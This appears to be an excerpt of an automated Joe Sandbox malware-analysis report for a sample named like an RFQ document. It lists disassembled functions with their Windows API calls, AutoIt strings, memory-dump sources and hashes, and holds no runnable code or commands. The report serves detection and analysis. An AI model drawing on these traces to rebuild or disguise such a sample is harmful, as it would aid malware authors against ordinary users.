                                              • Instruction ID: 4cda3920a88ebbe35154c0de2e49ba810f6bb2df9deb1bedec9240e1292468d1
                                              • Opcode Fuzzy Hash: 45e9ffb1fc9d37b51c9ddcb751a961c6e3f92ca895cbb0e166eaec62cefe1190
                                              • Instruction Fuzzy Hash: BC32EF36D69F014DD7239634D832336A259AFB63C4F15D73BE85AB6DE6EB6884C34100
                                              Function 0011267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b26512c8618029e71293c93b42eef8a6850ded6e49026735b5165711c152886
                                              • Instruction ID: faceb303a1f89fb940e5a5e3409245f3d7c33eda4918e2f81b3d46f909a9460b
                                              • Opcode Fuzzy Hash: 3b26512c8618029e71293c93b42eef8a6850ded6e49026735b5165711c152886
                                              • Instruction Fuzzy Hash: D4B1E120D2AF414DD2239A39883533ABA6CBFFB2C5B91D71BFC1A74D62EB2185C34141
                                              Function 00148B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • __time64.LIBCMT ref: 00148B25
                                                • Part of subcall function 0010543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001491F8,00000000,?,?,?,?,001493A9,00000000,?), ref: 00105443
                                                • Part of subcall function 0010543A: __aulldiv.LIBCMT ref: 00105463
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Time$FileSystem__aulldiv__time64
                                              • String ID:
                                              • API String ID: 2893107130-0
                                              • Opcode ID: 1de4b81e4cce50c4eb44320b90ac2a6a59bd2325bb957ad5f05100cdad9b93e0
                                              • Instruction ID: 27a01177d54b3de9a03486aa7352aea1c078f9ae988d4ba9cc221bdd5cc51fdc
                                              • Opcode Fuzzy Hash: 1de4b81e4cce50c4eb44320b90ac2a6a59bd2325bb957ad5f05100cdad9b93e0
                                              • Instruction Fuzzy Hash: EB21B1726356108FC729CF29D841A52B3E1EBA5321F288E6CD4E5CB2E0CB74BD45CB94
                                              Function 001541FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00154218
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: f624d1f87760c1a2a39adbe1dbf0808f985d39f070477601688371c3e66ef533
                                              • Instruction ID: bee89c9c06e7989eb4b8bf8107b47793055c0b2632df541175cc0710c6563e7b
                                              • Opcode Fuzzy Hash: f624d1f87760c1a2a39adbe1dbf0808f985d39f070477601688371c3e66ef533
                                              • Instruction Fuzzy Hash: 18E048752401149FC710EF5AE844A9AF7D8AF94761F018025FC49DB752DB70E8858B91
                                              Function 00144EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00144EEC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              • Opcode ID: 8c24e2210d2e04404c5feaf1fd45d5528f897be53fbf4fc0b9fbc75b3d8bbadc
                                              • Instruction ID: 2ccf902b8750191d7b2575d6f4e385425dbd983be005db292ff560a3881e741b
                                              • Opcode Fuzzy Hash: 8c24e2210d2e04404c5feaf1fd45d5528f897be53fbf4fc0b9fbc75b3d8bbadc
                                              • Instruction Fuzzy Hash: 78D05E981606053BFC2C4B249C5FFB70108F300791FE0414AB142A90E2DAD86C526031
                                              Function 00138C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001388D1), ref: 00138CB3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: 4b1202c21f0f1c3715e49ddccaae690bfc6071c07a875fcec3fdf8d613ec10f5
                                              • Instruction ID: 66651879273234535015ad79527cad1502c43d37beaa4d415ff98fa015f18dcb
                                              • Opcode Fuzzy Hash: 4b1202c21f0f1c3715e49ddccaae690bfc6071c07a875fcec3fdf8d613ec10f5
                                              • Instruction Fuzzy Hash: A2D05E3226050EBBEF018EA4ED05EAE3B6AEB04B01F408111FE15C50A1C7B5D835AB60
                                              Function 00122230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00122242
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: 4b62eec60d031af20b104d0c7a963956a18b20c054822ed3b6aa4cb400562fc9
                                              • Instruction ID: d03120763606d2d5179ed72fa609ecff9753a2fe6062547ac1e8977a3eafb889
                                              • Opcode Fuzzy Hash: 4b62eec60d031af20b104d0c7a963956a18b20c054822ed3b6aa4cb400562fc9
                                              • Instruction Fuzzy Hash: 88C04CF1800119DBDB05DB90E988DFE77BCAB04305F104055E101F2100D7749B448A71
                                              Function 0010A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0010A36A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: e7edb7c8885b745ee5b1e6fdac98ffe4a1e21501aee06a5ab4999231472f8299
                                              • Instruction ID: 05e22e7db85e7cc985d270261d3bb4b5e7c06901ca348b8760b2526d0d24f204
                                              • Opcode Fuzzy Hash: e7edb7c8885b745ee5b1e6fdac98ffe4a1e21501aee06a5ab4999231472f8299
                                              • Instruction Fuzzy Hash: CDA0123000010CA78A001B41FC044447F5CE7001907004020F40C40521977254518580
                                              Function 000F8A0E Relevance: .6, Instructions: 608COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 995461ae07095e0c1999e25c16ea15aee22cdbd1b9392c9b4ae543e88c9bb146
                                              • Instruction ID: 384de962a10c1a8bb057199b973e04dc1e30e21cd0e2ab0c8d4d96b7e6965dfe
                                              • Opcode Fuzzy Hash: 995461ae07095e0c1999e25c16ea15aee22cdbd1b9392c9b4ae543e88c9bb146
                                              • Instruction Fuzzy Hash: E122397060565ACBDF388F14C4946FD77E2FF02704F69C46ADA468BA91DB309D81EBA0
                                              Function 00102405 Relevance: .3, Instructions: 345COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 6f7ac1c595c126da84573cee22e9e24e56b7da1194c4da88ab56e92fe3ed7263
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: D7C1A3322051930ADF2D8639D53813EFAE15EA27B131A075DE8F3CB5C5EFA4D568E620
                                              Function 0010283A Relevance: .3, Instructions: 341COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: 0a99ca5466220acb8972498d15f4184bfc31f92c8f03bf1729d069f9344382bf
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 74C1A2322051A30ADF6D463A953803EBBE15BA27B131A076DE4F3DB5C4EF74D528E620
                                              Function 00157B1B Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00157B70
                                              • DeleteObject.GDI32(00000000), ref: 00157B82
                                              • DestroyWindow.USER32 ref: 00157B90
                                              • GetDesktopWindow.USER32 ref: 00157BAA
                                              • GetWindowRect.USER32(00000000), ref: 00157BB1
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00157CF2
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00157D02
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157D4A
                                              • GetClientRect.USER32(00000000,?), ref: 00157D56
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00157D90
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DB2
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DC5
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DD0
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DD9
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DE8
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DF1
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DF8
                                              • GlobalFree.KERNEL32(00000000), ref: 00157E03
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157E15
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00172CAC,00000000), ref: 00157E2B
                                              • GlobalFree.KERNEL32(00000000), ref: 00157E3B
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00157E61
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00157E80
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157EA2
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0015808F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-3613752883
                                              • Opcode ID: 975425bddcd24f889d768fa16dc1e6ec1f766f9e47529b543669e329f02abecf
                                              • Instruction ID: 1aeec0c35f9d0ed3f6b198d993e8369540daab39776be3f5a06f79b0dc3f8736
                                              • Opcode Fuzzy Hash: 975425bddcd24f889d768fa16dc1e6ec1f766f9e47529b543669e329f02abecf
                                              • Instruction Fuzzy Hash: 33029C71900105EFDB14DFA8EC89EAE7BB9FF49311F148159F925AB2A1CB70AD41CB60
                                              Function 0016A849 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 274COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 0016A89F
                                              • GetSysColorBrush.USER32(0000000F), ref: 0016A8D0
                                              • GetSysColor.USER32(0000000F), ref: 0016A8DC
                                              • SetBkColor.GDI32(?,000000FF), ref: 0016A8F6
                                              • SelectObject.GDI32(?,?), ref: 0016A905
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0016A930
                                              • GetSysColor.USER32(00000010), ref: 0016A938
                                              • CreateSolidBrush.GDI32(00000000), ref: 0016A93F
                                              • FrameRect.USER32(?,?,00000000), ref: 0016A94E
                                              • DeleteObject.GDI32(00000000), ref: 0016A955
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0016A9A0
                                              • FillRect.USER32(?,?,?), ref: 0016A9D2
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016A9FD
                                                • Part of subcall function 0016AB60: GetSysColor.USER32(00000012), ref: 0016AB99
                                                • Part of subcall function 0016AB60: SetTextColor.GDI32(?,?), ref: 0016AB9D
                                                • Part of subcall function 0016AB60: GetSysColorBrush.USER32(0000000F), ref: 0016ABB3
                                                • Part of subcall function 0016AB60: GetSysColor.USER32(0000000F), ref: 0016ABBE
                                                • Part of subcall function 0016AB60: GetSysColor.USER32(00000011), ref: 0016ABDB
                                                • Part of subcall function 0016AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0016ABE9
                                                • Part of subcall function 0016AB60: SelectObject.GDI32(?,00000000), ref: 0016ABFA
                                                • Part of subcall function 0016AB60: SetBkColor.GDI32(?,00000000), ref: 0016AC03
                                                • Part of subcall function 0016AB60: SelectObject.GDI32(?,?), ref: 0016AC10
                                                • Part of subcall function 0016AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0016AC2F
                                                • Part of subcall function 0016AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0016AC46
                                                • Part of subcall function 0016AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0016AC5B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID: @U=u
                                              • API String ID: 4124339563-2594219639
                                              • Opcode ID: bb6aa164a25611ea7e341522bd7bc3ede189752748e43831582176f0b07847dd
                                              • Instruction ID: 966a389240eb09bad417a73501adfd7d23449f510fb4c9fe67aa0fc0c6ade58b
                                              • Opcode Fuzzy Hash: bb6aa164a25611ea7e341522bd7bc3ede189752748e43831582176f0b07847dd
                                              • Instruction Fuzzy Hash: 9FA17072008301EFD7109F64EC08A6B7BA9FF89321F504A2DF962A61E1D7B1D985CF52
                                              Function 001637F3 Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,0016F910), ref: 001638AF
                                              • IsWindowVisible.USER32(?), ref: 001638D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-3469695742
                                              • Opcode ID: 3c332e01b15b19900cf84b833a36bb33e6c48ef69607afe6b4980e18047a31a0
                                              • Instruction ID: a496aea843b3314588b2abfddf2b4c5e83131a2fca2416d9753baad1bb71fa83
                                              • Opcode Fuzzy Hash: 3c332e01b15b19900cf84b833a36bb33e6c48ef69607afe6b4980e18047a31a0
                                              • Instruction Fuzzy Hash: 69D1B1302083059FCB14EF50C991AAEB7A5AFA4754F15445CF8966B3E3CB70EE1ACB91
                                              Function 000E2C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?,?), ref: 000E2CA2
                                              • DeleteObject.GDI32(00000000), ref: 000E2CE8
                                              • DeleteObject.GDI32(00000000), ref: 000E2CF3
                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 000E2CFE
                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 000E2D09
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0011C68B
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0011C6C4
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0011CAED
                                                • Part of subcall function 000E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E2036,?,00000000,?,?,?,?,000E16CB,00000000,?), ref: 000E1B9A
                                              • SendMessageW.USER32(?,00001053), ref: 0011CB2A
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0011CB41
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0011CB57
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0011CB62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                              • String ID: 0$@U=u
                                              • API String ID: 464785882-975001249
                                              • Opcode ID: c8602cca8b687e2ffe978fcada0b2ca83c17f7ab95c9b94a517ee948e6b75e16
                                              • Instruction ID: 67ea45a797ef47db25f9cc3271af5645851a13fdb9be40ce26a4ff0d1ff74bff
                                              • Opcode Fuzzy Hash: c8602cca8b687e2ffe978fcada0b2ca83c17f7ab95c9b94a517ee948e6b75e16
                                              • Instruction Fuzzy Hash: 1212AD70644245EFCB29CF24C884BE9B7E5BF04310F244579E896DB6A2C771EC82CB91
                                              Function 001577BE Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 001577F1
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001578B0
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001578EE
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00157900
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00157946
                                              • GetClientRect.USER32(00000000,?), ref: 00157952
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00157996
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001579A5
                                              • GetStockObject.GDI32(00000011), ref: 001579B5
                                              • SelectObject.GDI32(00000000,00000000), ref: 001579B9
